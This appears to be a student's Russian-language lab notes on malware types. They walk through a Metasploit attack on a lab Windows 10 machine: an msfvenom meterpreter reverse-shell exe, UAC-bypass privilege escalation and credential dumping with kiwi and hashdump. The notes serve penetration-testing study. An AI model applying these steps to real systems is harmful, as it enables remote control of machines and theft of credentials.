## Виды Malvare
1. Viruses - вредоносное програмное обеспечение, которое автоматически распространяеся по компьютерам.Цель: уничтожение данных или шифрация
2. Trojan - вредоносное програмное обеспечение, которое отправляет данные на сервер злоумышлинника
3. Malvare shell - вредоносное програмное обеспечение, которое устанавливает соединение с сервером злоумышленником, для управления зараженным устройством.
4. Malvare sctipts(Link) - ссылки с js скриптами или сами скрипты, например для майнинга криптавалюты.
5. Stealer — вредоносное программное обеспечение, предназначенное для кражи ценных данных с зараженной машины, таких как куки-файлы, логины и пароли, скрины с рабочего стола.
## Reverse Shell
Зайдем в msfconsole, выберем multi/handler, выставим порт Kali и запустим.
изменим lhost на ip адрес Kali
изменим payload на windows/x64/meterpreter/reverse_tcp
multi/handler будет прослушывать ip адрес Kali порт 4444 и ждать когда поступит соединение.

Далее с помощью msfvenom создадим вредоностный exe файл для подключения с помощью meterpreter
укажим в параметрах payload windows/x64/meterpreter/reverse_tcp, порт и адрес которые мы прослушиваем с помощью multi/handler и расширене файл exe.

Перекинем файл на Win10, предварительно выключив антивирус.
Для этого на Kali включим ssh командами
sudo systemctl enable ssh
sudo service ssh start

С помощью команды sudo systemctl status ssh проверим, что все работает.

В Win10 зайдем в консоль и перекинем файл с помощью scp командой
scp \*пользователь\*:\*ip Kali\* \*путь к файлу на Kali\* \*путь сохранения на win10\*

Запустим файл.
Увидим, что мы смогли подключиться на Kali.

## LPE - Local Privilege Escolation
### 1. Способ
Для повышения привилегий уберем текущую сессию в бэкграунд c помощью команды bg.
выберем exploit windows/local/bypassuac_injection с помощью команды use exploit/windows/local/bypassuac_injection
В настройках эксплойта изменим сессию на номер той, которую убрали в бэкграунд.
Так же выберем windows(x64)
запустим с помощью команды run

Создастся новая сессия.
Перейдем в нее с помощью команды
sessions \*номер сессии\*
Напишем getsystem для повышения привилегий. С помощью getuid проверим текущего ползователя.

### 2. Способ
Для повышения привилегий уберем текущую сессию в бэкграунд.
выберем exploit windows/local/bypassuac_sdctl
изменим сессию на убранную в бэкграунд и запустим

### 3. Способ
Для повышения привилегий запустим создыннй exe файл от имени администратора.

В созданной сессии напишем getsystem и мы получим права системы.

## Creads_all
Можем получить учетные записи системы.
Для этого загрузим модуль kiwi
load kiwi
и пропишем creds_all

Как можем заметить, пароли не показались. Попробуем другой способ.
## Post
С помощью post/windows/gather/hashdump.
Для этого выберем данный пост
use post/windows/gather/hashdump
Затем укжем номер сессиии с win10
set session \*номер сессии\*
запустим с помощью команды run
